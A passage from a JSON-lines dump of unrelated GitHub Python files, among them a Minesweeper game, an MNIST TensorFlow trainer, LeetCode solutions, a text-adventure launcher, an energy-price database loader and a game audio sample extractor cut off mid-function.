cv2.imencode('.jpg', image)[1].tostring()\r\n return img_str\r\n\r\ndef array2PIL(arr, size):\r\n mode = 'RGBA'\r\n arr = arr.reshape(arr.shape[0] * arr.shape[1], arr.shape[2])\r\n if len(arr[0]) == 3:\r\n arr = np.c_[arr, 255 * np.ones((len(arr), 1), np.uint8)]\r\n return Image.frombuffer(mode, size, arr.tostring(), 'raw', mode, 0, 1)\r\n","repo_name":"LearnBits/RaspberryPI-webapp","sub_path":"learnbits/app/compvision/jpeg.py","file_name":"jpeg.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36660336020","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, x: int, next: 'Node' = None, random: 'Node' = None):\n self.val = int(x)\n self.next = next\n self.random = random\n\"\"\"\n\nclass Solution:\n def copyRandomList(self, head: 'Optional[Node]') -> 'Optional[Node]':\n dic = {None: None}\n curr = head\n while curr:\n dic[curr] = Node(x=curr.val)\n curr = curr.next\n \n curr = head\n while curr:\n dic[curr].next = dic[curr.next]\n dic[curr].random = dic[curr.random]\n curr = curr.next\n \n return dic[head]\n ","repo_name":"rhee519/LeetCode","sub_path":"138-copy-list-with-random-pointer/138-copy-list-with-random-pointer.py","file_name":"138-copy-list-with-random-pointer.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9371039223","text":"from tkinter import *\nfrom tkinter import ttk\nfrom tkinter import messagebox\nfrom random import randint\nfrom random import *\n\nN = 20 #게임판의 갯수를 20*20 의 크기로 만든다.\nbomb = 40 # 지뢰 갯수를 40개로 만든다.\n\ncnt = 0\nmap = [[0 for col in range(N+2)] for row in range(N+2)] # 맵을 만들자.\nbuttonchk = [[0 for col in range(N)] for row in range(N)]\nButton_X = [[0 for col in range(N)] for row in range(N)]\ndir = [[0,1],[0,-1],[1,0],[-1,0]]\nflag = bomb\n\nroot = Tk()\nroot.geometry(\"800x800\")\nvisit = [[0 for col in range(N)] for row in range(N)]\n\ndef clear():\n for i in range(N):\n for j in range(N):\n visit[i][j] = 0\n\n# 게임을 성공했을때 메시지를 띄우자\ndef Game_clear():\n messagebox.showinfo(\"Success!\",\"Congratulations! 
You have Successed This Game!\")\n\n# 왼쪽 버튼 클릭시 0의 위치이면 근처의 0의 위치를 모두 찾아서 셋팅하자.\ndef DFS(indx,indy):\n if(indx < 0 or indx >= N):\n return 0\n if(indy < 0 or indy >= N):\n return 0\n\n #print(indx,indy)\n if Button_X[indy][indx] == 1:\n return 0\n if visit[indy][indx] == 0:\n visit[indy][indx] = 1\n if map[indy][indx] == 0:\n Button_map[indy][indx].Show(indx,indy)\n buttonchk[indy][indx] = 1\n elif map[indy][indx] > 0:\n Button_map[indy][indx].Show(indx, indy)\n buttonchk[indy][indx] = 1\n return 0\n for i in range(4):\n DFS(indx+dir[i][0],indy+dir[i][1])\n\n else:\n return 0\n\n\"\"\"\ndef right(a,b):\n global flag\n cnt = 0\n print(\"right_clicked\")\n if(not Button_X[b][a] == 1 and buttonchk[b][a] == 0):\n if(flag > 0):\n print(flag)\n Button_map[b][a].Num_Button[\"bg\"] = \"red\" #버튼의 색상을 변경하려고 했는데 변경이 안되고 bg 에러가 발생\n Button_X[b][a] = 1\n flag -= 1\n if(flag == 0):\n for i in range(N):\n for j in range(N):\n if(buttonchk[i][j] == 1 and not map[i][j] == -1):\n cnt += 1\n\n if cnt == 360:\n Game_clear()\n elif(Button_X[b][a] == 1):\n Button_map[b][a].Num_Button[\"bg\"] = \"white\"\n Button_X[b][a] = 0\n flag += 1\ndef right(event):\n global flag\n cnt = 0\n a=10\n b=10\n print(\"right_clicked\")\n print(type(Button_map[b][a].Num_Button))\n Button_map[b][a].Num_Button.configure(Button_map[b][a].Num_Button,bg=\"white\")\n if(not Button_X[b][a] == 1 and buttonchk[b][a] == 0):\n if(flag > 0):\n print(flag)\n Button_map[b][a].Num_Button[\"bg\"] = \"red\"\n Button_X[b][a] = 1\n flag -= 1\n if(flag == 0):\n for i in range(N):\n for j in range(N):\n if(buttonchk[i][j] == 1 and not map[i][j] == -1):\n cnt += 1\n\n if cnt == 360:\n Game_clear()\n elif(Button_X[b][a] == 1):\n Button_map[b][a].Num_Button[\"bg\"] = \"white\"\n Button_X[b][a] = 0\n flag += 1\n\"\"\"\n\n# 버튼 클래스를 만들자.\nclass Button_:\n global map\n def __init__(self,x,y):\n self.tmpx = x\n self.tmpy = y\n self.Num_Button = ttk.Button(root,width = 4)\n self.Num_Button.grid(row=y, column=x,ipady = 5)\n self.Num_Button.bind('', self.Left)\n self.Num_Button.bind('', self.right)\n\n def Show(self,x1,y1):\n self.Num_Button.configure(text = str(map[y1][x1]))\n\n def Left(self,event):\n if(Button_X[self.tmpy][self.tmpx] == 0):\n if(map[self.tmpy][self.tmpx] == -1):\n Button_map[self.tmpy][self.tmpx].Show(self.tmpx,self.tmpy)\n Game_over()\n elif(map[self.tmpy][self.tmpx] == 0):\n Button_map[self.tmpy][self.tmpx].Show(self.tmpx,self.tmpy)\n buttonchk[self.tmpy][self.tmpx] = 1\n clear()\n DFS(self.tmpx,self.tmpy)\n else:\n Button_map[self.tmpy][self.tmpx].Show(self.tmpx,self.tmpy)\n buttonchk[self.tmpy][self.tmpx] = 1\n #obj = Button_map[tmpy][tmpx]\n #print(\"clicked\")\n if (flag == 0):\n cnt = 0\n for i in range(N):\n for j in range(N):\n if (buttonchk[i][j] == 1 and not map[i][j] == -1):\n cnt += 1\n if cnt == N*N-bomb:\n Game_clear()\n\n def right(self, event):\n global flag\n cnt = 0\n #print(\"right_clicked\")\n\n if (not Button_X[self.tmpy][self.tmpx] == 1 and buttonchk[self.tmpy][self.tmpx] == 0):\n if (flag > 0):\n #print(flag)\n Button_map[self.tmpy][self.tmpx].Num_Button.configure(text = \"X\")\n Button_X[self.tmpy][self.tmpx] = 1\n flag -= 1\n\n elif (Button_X[self.tmpy][self.tmpx] == 1 and buttonchk[self.tmpy][self.tmpx] == 0):\n #print(\"came\")\n Button_map[self.tmpy][self.tmpx].Num_Button.configure(text = \" \")\n Button_X[self.tmpy][self.tmpx] = 0\n flag += 1\n if (flag == 0):\n for i in range(N):\n for j in range(N):\n if (buttonchk[i][j] == 1 and not map[i][j] == -1):\n cnt += 1\n if cnt == N*N-bomb:\n 
Game_clear()\n\n\nButton_map = [[Button_(0,0) for col in range(N)] for row in range(N)]\n\n# 게임실패시 메시지를 띄우자.\ndef Game_over():\n for i in range(N):\n for j in range(N):\n Button_map[i][j].Show(j,i)\n messagebox.showinfo(\"Game over...\", \"You Have Failed This Game... Try agian!\")\n #frame = ttk.Frame(root,width = 50,height = 50,text = \"Game over! Try again!\")\n #frame.pack()\n\n# 사방의 지뢰의 갯수를 세어서 리턴하자\ndef count(x,y):\n cnt_ = 0\n if(map[x + 1][y] == -1):\n cnt_ += 1\n if(map[x - 1][y] == -1):\n cnt_ += 1\n if(map[x][y + 1] == -1):\n cnt_ += 1\n if(map[x][y - 1] == -1):\n cnt_ += 1\n if(map[x + 1][y + 1] == -1):\n cnt_ += 1\n if(map[x + 1][y - 1] == -1):\n cnt_ += 1\n if(map[x - 1][y + 1] == -1):\n cnt_ += 1\n if(map[x - 1][y - 1] == -1):\n cnt_ += 1\n return cnt_\n\n# 맵을 0으로 초기화 하자\nfor i in range(N):\n for j in range(N):\n map[i][j] = 0\n\n\n\n# 지뢰 갯수만큼 랜덤위치에 지뢰를 -1로 셋팅하자.\nwhile(cnt < bomb):\n tmpx = randint(0,N-1)\n tmpy = randint(0,N-1)\n if(map[tmpy][tmpx] == -1):\n pass\n else:\n map[tmpy][tmpx] = -1\n cnt += 1\n\n# 지뢰 갯수를 세어서 맵에 셋팅하자.\nfor i in range(N):\n for j in range(N):\n if(map[i][j] == 0):\n map[i][j] = count(i,j)\n\n# 버튼을 20*20으로 만들어서 셋팅하자.\nfor i in range(N):\n for j in range(N):\n Button_map[i][j] = Button_(j,i)\n\nroot.mainloop()","repo_name":"hunter10/Python_Minesweeper_Test","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":6989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18790900048","text":"# coding=utf-8\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\n# MNIST数据集相关的常数\nINPUT_NODE = 784\nOUTPUT_NODE = 10\n\n# 配置神经网络的参数\nLAYER1_NODE = 500 # 隐藏层节点数\nBATCH_SIZE = 100 # 一个batch的训练数据个数\nLEARNING_RATE_BASE = 0.8 # 基础的学习率\nLEARNING_RATE_DECAY = 0.99 # 学习率的衰减率\nREGULARIZATION_RATE = 0.0001 # 描述模型复杂度的正则化项在损失函数中的���数\nTRAINING_STEPS = 30000 # 训练轮数\nMOVING_AVERAGE_DECAY = 0.99 # 滑动平均衰减率\n\n\n# 定义一个函数,计算神经网络的前向传播结果\ndef inference(input_tensor, avg_class, weights1, biases1, weights2, biases2):\n # 当没有提供滑动平均类时,使用relu激活函数\n if avg_class is None:\n layer1 = tf.nn.relu(tf.matmul(input_tensor, weights1) + biases1)\n return tf.matmul(layer1, weights2) + biases2\n\n else:\n # 使用avg_class.average函数计算变量的滑动平均值\n # 然后再计算相应的神经网络前向传播结果\n layer1 = tf.nn.relu(tf.matmul(input_tensor, avg_class.average(weights1)) + avg_class.average(biases1))\n return tf.matmul(layer1, avg_class.average(weights2)) + avg_class.average(biases2)\n\n\ndef train(mnist):\n x = tf.placeholder(tf.float32, [None, INPUT_NODE], name='x-input')\n y_ = tf.placeholder(tf.float32, [None, OUTPUT_NODE], name='y-input')\n\n # 生成隐藏层的参数\n weight1 = tf.Variable(tf.truncated_normal([INPUT_NODE, LAYER1_NODE]))\n biases1 = tf.Variable(tf.constant(0.1, shape=[LAYER1_NODE]))\n # 生成输出层的参数\n weight2 = tf.Variable(tf.truncated_normal([LAYER1_NODE, OUTPUT_NODE]))\n biases2 = tf.Variable(tf.constant(0.1, shape=[OUTPUT_NODE]))\n\n # 计算在当前参数下神经网络前向传播的结果\n y = inference(x, None, weight1, biases1, weight2, biases2)\n\n # 定义存储训练轮数的变量\n globa_step = tf.Variable(0, trainable=False)\n\n # 初始化滑动平均类\n variable_averages = tf.train.ExponentialMovingAverage(MOVING_AVERAGE_DECAY, globa_step)\n # 在所有代表神经网络参数的变量上使用滑动平均\n variable_averages_op = variable_averages.apply(tf.trainable_variables())\n # 计算使用了滑动平均之后的前向传播结果\n average_y = inference(x, variable_averages, weight1, biases1, weight2, biases2)\n\n cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=y, labels=tf.argmax(y_, 1))\n\n # 
计算当前batch中所有样例的交叉熵平均值\n cross_entropy_mean = tf.reduce_mean(cross_entropy)\n\n # ???????????????????????????????\n regularizer = tf.contrib.layers.l2_regularizer(REGULARIZATION_RATE)\n regularization = regularizer(weight1) + regularizer(weight2)\n loss = cross_entropy_mean + regularization\n\n learning_rate = tf.train.exponential_decay(LEARNING_RATE_BASE,\n globa_step,\n mnist.train.num_examples / BATCH_SIZE,\n LEARNING_RATE_DECAY)\n\n # 优化损失函数\n train_step = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss, global_step=globa_step)\n\n with tf.control_dependencies([train_step, variable_averages_op]):\n train_op = tf.no_op(name='train')\n\n correct_prediction = tf.equal(tf.argmax(average_y, 1), tf.argmax(y_, 1))\n\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n\n validate_feed = {x: mnist.validation.images,\n y_: mnist.validation.labels}\n\n test_feed = {x: mnist.test.images,\n y_: mnist.test.labels}\n\n for i in range(TRAINING_STEPS):\n if i % 1000 == 0:\n # 计算滑动平均模型在验证数据上的结果\n validate_acc = sess.run(accuracy, feed_dict=validate_feed) # ?????????????????\n print (\"after %d training steps , validation accuracy using average model is %g\" % (i, validate_acc))\n\n xs, ys = mnist.train.next_batch(BATCH_SIZE)\n sess.run(train_op, feed_dict={x: xs, y_: ys})\n\n # 训练结束后,在测试数据上检测神经网络模型的最终正确率\n test_acc = sess.run(accuracy, feed_dict=test_feed)\n print (\"after %d training steps , test accuracy using average model is %g\" % (TRAINING_STEPS, test_acc))\n\n\ndef main(argv=None):\n mnist = input_data.read_data_sets(\"/tmp/data\", one_hot=True)\n train(mnist)\n\n\nif __name__ == '__main__':\n tf.app.run()\n","repo_name":"space0o0/tensorflow_learn","sub_path":"tensorflow_learn/date_510/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":4734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18869528820","text":"import operator\n\nclass Functions:\n #not used, this takes in 3 points and returns the a, b , c for a quad equation\n def QuadCreate(self, point1, point2, point3):\n x1 = point1[0]\n x2 = point2[0]\n x3 = point3[0]\n y1 = point1[1]\n y2 = point2[1]\n y3 = point3[1]\n a = \"\"\n b = \"\"\n c = \"\"\n x4 = \"\"\n x5 = \"\"\n x6 = \"\"\n x7 = \"\"\n y4 = \"\"\n y5 = \"\"\n\n y4 = y1-y2\n x4 = x1**2 - x2**2\n x5 = x1 - x2\n\n y5 = y1-y3\n x6 = x1**2 - x3**2\n x7 = x1 - x3\n\n tmpy4 = y4 * x7\n tmpx4 = x4 * x7\n tmpy5 = y5 * x5\n tmpx6 = x6 * x5\n if (tmpx4 - tmpx6) == 0:\n a = 1\n else:\n a = (tmpy4 - tmpy5)/(tmpx4 - tmpx6)\n\n if x7 == 0:\n b = 1\n else:\n b = (y5 - (x6*a))/x7\n\n c = y1 - (a*x1**2)- (b*x1)\n\n quadDic = {'a':a,'b':b,'c':c}\n return quadDic\n\n #reads in a file and returns points\n def ReadInFile(self, file_location):\n # file_location = r'C:\\Users\\Carrot\\Documents\\GitHub\\CS8803\\Resources\\Inputs\\test01.txt'\n\n with open(file_location , 'r') as content_file:\n content = content_file.read()\n\n content = content.split(\"\\n\")\n\n array = []\n\n for val in content:\n x = val.split(\",\")\n if x != ['']: # in case of empty line in test file\n array.append([int(x[0]),int(x[1])])\n return array\n\n #not used, calculates the rectangle of the area and adds in an additional\n #range. 
If the current_location is within that range returns true\r\n    def WithinRangeSides(self, points, current_location, Rangex = 10, Rangey = 10):\r\n\r\n        xMin = sorted(points)[0][0]\r\n        xMax = sorted(points)[len(points)-1][0]\r\n        points.sort(key=operator.itemgetter(1))\r\n        yMin = points[0][1]\r\n        yMax = points[len(points)-1][1]\r\n\r\n        if current_location[0] < xMin - Rangex:\r\n            return False\r\n        if current_location[0] > xMax + Rangex:\r\n            return False\r\n        if current_location[1] < yMin - Rangey:\r\n            return False\r\n        if current_location[1] > yMax + Rangey:\r\n            return False\r\n        else:\r\n            return True\r\n\r\n    #not used, calculates the candle of the area and adds in an additional\r\n    #range. If the current_location is within that range returns true\r\n    def WithinRangeCandle(self, current_location, Range = 5):\r\n        Radius = Range + 34\r\n        Candle_Center = (334, 178)\r\n\r\n        if (current_location[0] - Candle_Center[0])**2 + (current_location[1] - Candle_Center[1])**2 <= Radius**2:\r\n            return True\r\n        else:\r\n            return False\r\n","repo_name":"dstevens34/AI_Robotics_Project","sub_path":"Davids try/project/Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2632468314","text":"import sys\nimport time\n\nfrom pathlib import Path\n\nfrom textadventure.input.inputhandling import CommandInput, FlagData\nfrom textadventure.saving.saving import SavePath\n\n\nfrom ninjagame.game import NinjaGame\nfrom textadventure.clientside.inputs import TextPrinterInputGetter, KeyboardInputGetter\nfrom textadventure.clientside.outputs import TextPrinterOutput, LocationTitleBarManager, ImmediateStreamOutput, \\\n    OutputNotifierSender\nfrom textadventure.mainclass import ClientSideMain\nfrom textadventure.player import Player\nfrom textadventure.sending.message import Message, MessageType\nfrom textprint.colors import Color\nfrom textprint.inithelper import curses_init, std_init, curses_end, add_interrupt_handler, colorama_init\nfrom textadventure.handler import PlayerHandler\n\n\"\"\"\nThis file is an example game for my text adventure api using the ninjagame package\n\nThis file is not meant to be imported which is why it is not in any package right now\n\"\"\"\n\n\ndef create_fancy_player(stdscr, savable):\n    from textprint.input import InputLineUpdater\n    from textprint.section import Section\n    from textprint.textprinter import TextPrinter\n\n    curses_init()\n    std_init(stdscr)\n    colorama_init()\n\n    input_section = Section(None, fill_up_left_over=False)  # we want to allow it to go for as many lines it needs\n    temp_section = Section(None, fill_up_left_over=False)\n    print_section = Section(None, fake_line=(Color.BLUE >> \"~\"))\n    title_section = Section(1)\n    printer = TextPrinter([input_section, temp_section, print_section, title_section],\n                          print_from_top=False, stdscr=stdscr)\n    printer.update_dimensions()\n    # print_section.fake_line = Color.RED + Color.BOLD + \"|\" + (\" \" * (printer.dimensions[1] - 3)) + \"|\"\n\n    updater = InputLineUpdater(printer, input_section.println(printer, \"\", flush=True), stdscr)\n    player_input = TextPrinterInputGetter(updater)\n    # input_manager = InputLineUpdaterManager(updater)  # calls updater's update\n    output = OutputNotifierSender(TextPrinterOutput(printer, print_section),\n                                  lambda: temp_output.section.clear_lines(printer, flush=True))\n    temp_output = TextPrinterOutput(printer, temp_section)\n    player = Player(player_input, output, savable)\n\n    def interrupt_handler():\n        if updater.current_line().is_clear():\n            
temp_output.send_message(Message(Color.YELLOW >> \"Press CTRL+D to exit\", message_type=MessageType.IMMEDIATE))\n print_section.update_lines(printer, flush=True, force_reprint=True)\n else:\n updater.current_line().clear()\n\n add_interrupt_handler(interrupt_handler) # clear line when CTRL+C is pressed\n\n title_manager = LocationTitleBarManager(player, printer, title_section.println(printer, \"\"))\n\n return player, [player_input, output, temp_output, title_manager], lambda: curses_end()\n\n\ndef create_simple_player(savable):\n\n colorama_init()\n print()\n\n player_input = KeyboardInputGetter()\n player_input.start()\n\n output = ImmediateStreamOutput()\n\n player = Player(player_input, output, savable)\n\n return player, [output], lambda: None\n\n\ndef auto_flag_setup():\n command = CommandInput(CommandInput.join(sys.argv))\n options = {\n (\"rest\", \"r\"): 1,\n (\"simple\", \"windows\", \"dos\"): 0,\n (\"file\", \"f\", \"save\", \"path\"): 1,\n (\"clean\", \"no_load\"): 0,\n (\"user\", \"u\", \"player\", \"name\"): 1\n }\n flag_data = FlagData(command, options)\n\n rest = 0.001\n string_rest = flag_data.get_flag(\"rest\")\n if string_rest is not None:\n try:\n rest = float(string_rest)\n except ValueError:\n print(\"'{}' is not a valid number for rest.\".format(string_rest))\n sys.exit(1)\n if rest > 1:\n print(\"Rest cannot be greater than 1. Rest is the amount of time in seconds it waits to update.\")\n print(\"Making this greater than 1 makes the game unresponsive for too long of a period.\")\n sys.exit(1)\n\n string_file = flag_data.get_flag(\"file\")\n save_path = SavePath(Path(\"./save.dat.d\"))\n if string_file:\n save_path = SavePath(Path(string_file))\n\n is_clean = flag_data.get_flag(\"clean\") # should we load data?\n\n player_handler = PlayerHandler(save_path)\n player_savable = None\n\n result = player_handler.load_player_savables() # load these anyway\n\n player_name = flag_data.get_flag(\"user\")\n if player_name is not None:\n if is_clean:\n print(\"Error: Using --clean flag but also specifying a player to load.\")\n sys.exit(1)\n if not result[0]:\n print(result[1])\n sys.exit(1)\n player_savable = player_handler.get_player_savable(player_name)\n if player_savable is None:\n print(\"Unable to find player with name: '{}'\".format(player_name))\n sys.exit(1)\n else:\n print(\"Successfully loaded player: '{}'\".format(player_savable.name))\n\n if flag_data.get_flag(\"simple\"):\n # setup_simple(player_savable)\n information = create_simple_player(player_savable)\n else:\n try:\n import curses\n import pyparsing\n except ModuleNotFoundError:\n print(\"Unable to load curses or pyparsing library. 
Initializing simple instead of fancy\")\n # setup_simple(player_savable)\n information = create_simple_player(player_savable)\n else:\n # setup_fancy(player_savable)\n information = create_fancy_player(curses.initscr(), player_savable)\n\n player, custom_managers, end_function = information\n try:\n main_instance = ClientSideMain(NinjaGame(), custom_managers, player, save_path, rest=rest,\n player_handler=player_handler)\n main_instance.start()\n\n while True:\n main_instance.update()\n time.sleep(rest)\n finally:\n end_function()\n\n\ndef main():\n try:\n auto_flag_setup()\n except KeyboardInterrupt:\n print(\"Ended program with a keyboard interrupt\")\n sys.exit(0)\n finally:\n try:\n curses_end()\n except ImportError:\n pass\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"retrodaredevil/python-text-adventure-api","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4294562821","text":"class Solution:\n def minimumTotal(self, triangle):\n n = len(triangle)\n dp = triangle[-1]\n i = n-2\n\n while i >=0:\n j = 0\n while j <= len(triangle[i])-1:\n dp[j] = min(dp[j], dp[j+1]) + triangle[i][j]\n j += 1\n i -= 1\n return dp[0]\n","repo_name":"Ryuk17/LeetCode","sub_path":"Python/120. Triangle.py","file_name":"120. Triangle.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"70100158967","text":"import os\nimport datetime\nimport math\nimport logging\nimport pandas as pd\n\nfrom modules.utils import Months\nfrom modules.utils import convert_to_numeric\n\nlogger = logging.getLogger('make_dataset')\n\n\nclass ClientDataError(Exception):\n '''\n Class used for throwing errors.\n '''\n\n\ndef populate_client_data(conn, parameters):\n '''\n Populates the SQL database with client's data.\n '''\n logger.info('. Populating data associated with generating assets')\n cursor = conn.cursor()\n _populate_hourly_prices(conn, cursor, parameters['Prices']['Hourly'])\n _populate_daily_prices(conn, cursor, parameters['Prices']['Daily'])\n _populate_generation(conn, cursor, parameters['Generation'])\n\n\ndef _populate_hourly_prices(conn, cursor, parameters):\n '''\n Populates hourly prices.\n '''\n f_in_name = parameters[0] # There is only one file\n\n # -- Power prices --\n\n logger.info('.. Reading \\'{}\\''.format(os.path.basename(f_in_name)))\n\n # Put all the data into a dataframe\n df = pd.read_excel(f_in_name)\n\n # Get product ID's\n cursor.execute(\n '''\n select id\n from tbl_ref_price_products\n where product = \\'DAH\\';\n ''')\n product_id = cursor.fetchone()[0]\n\n # Delete any previous records\n cursor.execute('delete from tbl_hist_intradayprices ' +\n 'where product_id = {};'.format(product_id))\n conn.commit()\n\n logger.info('.. 
Processing power spot prices')\n\n list_of_records = list()\n cur_row = 0\n while cur_row < len(df.index):\n if isinstance(df.iat[cur_row, 4], datetime.date):\n # For each hour\n for h in range(0, 24):\n if not math.isnan(df.iat[cur_row, h + 6]):\n record = dict({\n \"datehour\": datetime.datetime(\n df.iat[cur_row, 4].year,\n df.iat[cur_row, 4].month,\n df.iat[cur_row, 4].day, h, 0),\n \"product_id\": product_id,\n \"price\": convert_to_numeric(df.iat[cur_row, h + 6])\n })\n list_of_records.append(record)\n cur_row += 1\n df2 = pd.DataFrame(list_of_records)\n df2.to_sql('tbl_hist_intradayprices', conn,\n if_exists='append', index=False)\n conn.commit()\n\n\ndef _populate_daily_prices(conn, cursor, parameters):\n '''\n Populates daily prices.\n '''\n f_in_name = parameters[0] # There is only one file\n\n # -- Gas prices --\n\n logger.info('.. Reading gas prices from \\'{}\\''\n .format(os.path.basename(f_in_name)))\n\n # Put all the data into a dataframe\n df = pd.read_excel(f_in_name, sheet_name='Gas')\n\n # Get product ID's\n cursor.execute(\n '''\n select id\n from tbl_ref_price_products\n where product = \\'Z1\\';\n ''')\n product_id = cursor.fetchone()[0]\n\n # Delete any previous records\n cursor.execute('delete from tbl_hist_dailyprices ' +\n 'where product_id = {};'.format(product_id))\n conn.commit()\n\n logger.info('.. Processing gas cash prices')\n\n list_of_records = list()\n cur_row = 3\n while cur_row < len(df.index):\n if isinstance(df.iat[cur_row, 3], datetime.date):\n try:\n record = dict({\n \"date\": df.iat[cur_row, 3],\n \"product_id\": product_id,\n \"bid\": convert_to_numeric(df.iat[cur_row, 4]),\n \"ask\": convert_to_numeric(df.iat[cur_row, 4]),\n \"bid_size\": 0,\n \"ask_size\": 0\n })\n list_of_records.append(record)\n except KeyError:\n logger.warning('** Warning: Does not recognize price type ' +\n '\\'{}\\'.'.format(df.iat[cur_row, 0]))\n cur_row += 1\n df2 = pd.DataFrame(list_of_records)\n df2.to_sql('tbl_hist_dailyprices', conn, if_exists='append', index=False)\n conn.commit()\n\n # -- Carbon prices --\n\n logger.info('.. Reading carbon prices from \\'{}\\''\n .format(os.path.basename(f_in_name)))\n\n # Put all the data into a dataframe\n df = pd.read_excel(f_in_name, sheet_name='Carbon')\n\n # Get the product ID\n cursor.execute(\n '''\n select id\n from tbl_ref_price_products\n where product = \\'Carbon\\';\n ''')\n product_id = cursor.fetchone()[0]\n\n # Delete any previous records\n cursor.execute('delete from tbl_hist_dailyprices ' +\n 'where product_id = {};'.format(product_id))\n conn.commit()\n\n logger.info('.. Processing carbon prices')\n\n list_of_records = list()\n cur_row = 4\n while cur_row < len(df.index):\n if isinstance(df.iat[cur_row, 0], datetime.date):\n record = dict({\n \"date\": df.iat[cur_row, 0],\n \"product_id\": product_id,\n \"bid\": convert_to_numeric(df.iat[cur_row, 1]),\n \"ask\": convert_to_numeric(df.iat[cur_row, 1]),\n \"bid_size\": 0,\n \"ask_size\": 0\n })\n list_of_records.append(record)\n cur_row += 1\n df2 = pd.DataFrame(list_of_records)\n df2.to_sql('tbl_hist_dailyprices', conn, if_exists='append', index=False)\n conn.commit()\n\n\ndef _populate_generation(conn, cursor, parameters):\n '''\n Populates historical generation.\n '''\n f_in_name = parameters[0] # There is only one file\n\n logger.info('.. 
Reading generation from \\'{}\\''\n .format(os.path.basename(f_in_name)))\n\n # Put all the data into a dataframe\n df = pd.read_excel(f_in_name)\n\n # Get generating plant ID\n cursor.execute(\n '''\n select id\n from tbl_ref_power_plants\n where name = \\'PP\\';\n ''')\n plant_id = cursor.fetchone()[0]\n\n # Delete any previous records\n cursor.execute('delete from tbl_hist_generation ' +\n 'where plant_id = {};'.format(plant_id))\n conn.commit()\n\n logger.info('.. Processing generation for PP')\n\n list_of_records = list()\n cur_row = 3\n while cur_row < len(df.index):\n if isinstance(df.iat[cur_row, 1], datetime.datetime):\n record = dict({\n # Make sure we get a \"clean\" hour\n \"datehour\": datetime.datetime(\n df.iat[cur_row, 1].year,\n df.iat[cur_row, 1].month,\n df.iat[cur_row, 1].day,\n df.iat[cur_row, 1].hour),\n \"plant_id\": plant_id,\n \"generation\": convert_to_numeric(df.iat[cur_row, 2])\n })\n list_of_records.append(record)\n cur_row += 1\n df2 = pd.DataFrame(list_of_records)\n df2.to_sql('tbl_hist_generation', conn, if_exists='append', index=False)\n conn.commit()\n","repo_name":"pyxidr/data-science-consulting-part1","sub_path":"src/python/modules/client_data.py","file_name":"client_data.py","file_ext":"py","file_size_in_byte":6922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28907898586","text":"#\r\n# Biohazard 4 (GC) bio4midi.dat/hed sample extractor by Nisto\r\n# Last revision: Apr 28, 2015\r\n#\r\n# Developed under Python 3 and may or may not work with Python 2\r\n#\r\n\r\nimport os\r\nimport sys\r\nimport struct\r\n\r\nif sys.version_info[0] > 2:\r\n xrange = range\r\n\r\ndef samples_to_nibbles(samples):\r\n whole_frames = samples // 14\r\n remainder = samples % 14\r\n if remainder > 0:\r\n return (whole_frames * 16) + remainder + 2\r\n else:\r\n return whole_frames * 16\r\n\r\ndef samples_to_bytes(samples):\r\n nibbles = samples_to_nibbles(samples)\r\n return (nibbles // 2) + (nibbles % 2)\r\n\r\ndef extract_data(src, dst, size):\r\n read_max = 4096\r\n left = size\r\n while left:\r\n if read_max > left:\r\n read_max = left\r\n try:\r\n data = src.read(read_max)\r\n except EnvironmentError:\r\n sys.exit(\"ERROR: Read error at 0x%08X\" % src.tell())\r\n if data == b\"\":\r\n break # EOF\r\n try:\r\n dst.write(data)\r\n except EnvironmentError:\r\n sys.exit(\"ERROR: Write error at 0x%08X\" % dst.tell())\r\n left -= read_max\r\n\r\ndef dsp_header(meta):\r\n\r\n # 0x00 raw samples\r\n header = struct.pack(\">I\", meta[\"samples\"])\r\n\r\n\r\n # 0x04 nibbles\r\n nibbles = samples_to_nibbles(meta[\"samples\"])\r\n header += struct.pack(\">I\", nibbles)\r\n\r\n\r\n # 0x08 sample rate\r\n header += struct.pack(\">I\", meta[\"rate\"])\r\n\r\n\r\n # 0x0C loop flag\r\n header += struct.pack(\">H\", 0)\r\n\r\n\r\n # 0x0E format (always zero - ADPCM)\r\n header += struct.pack(\">H\", 0)\r\n\r\n\r\n # 0x10 loop start address (in nibbles)\r\n header += struct.pack(\">I\", 0)\r\n\r\n\r\n # 0x14 loop end address (in nibbles)\r\n header += struct.pack(\">I\", 0)\r\n\r\n\r\n # 0x18 initial offset value (in nibbles)\r\n header += struct.pack(\">I\", 2)\r\n\r\n\r\n # 0x1C coefficients\r\n header += meta[\"coeffs\"]\r\n\r\n\r\n # 0x3C gain (always zero for ADPCM)\r\n header += struct.pack(\">H\", 0)\r\n\r\n\r\n # 0x3E predictor/scale\r\n header += meta[\"ps\"]\r\n\r\n\r\n # 0x40 sample history (n-1)\r\n header += struct.pack(\">H\", 0)\r\n\r\n\r\n # 0x42 sample history (n-2)\r\n header += struct.pack(\">H\", 
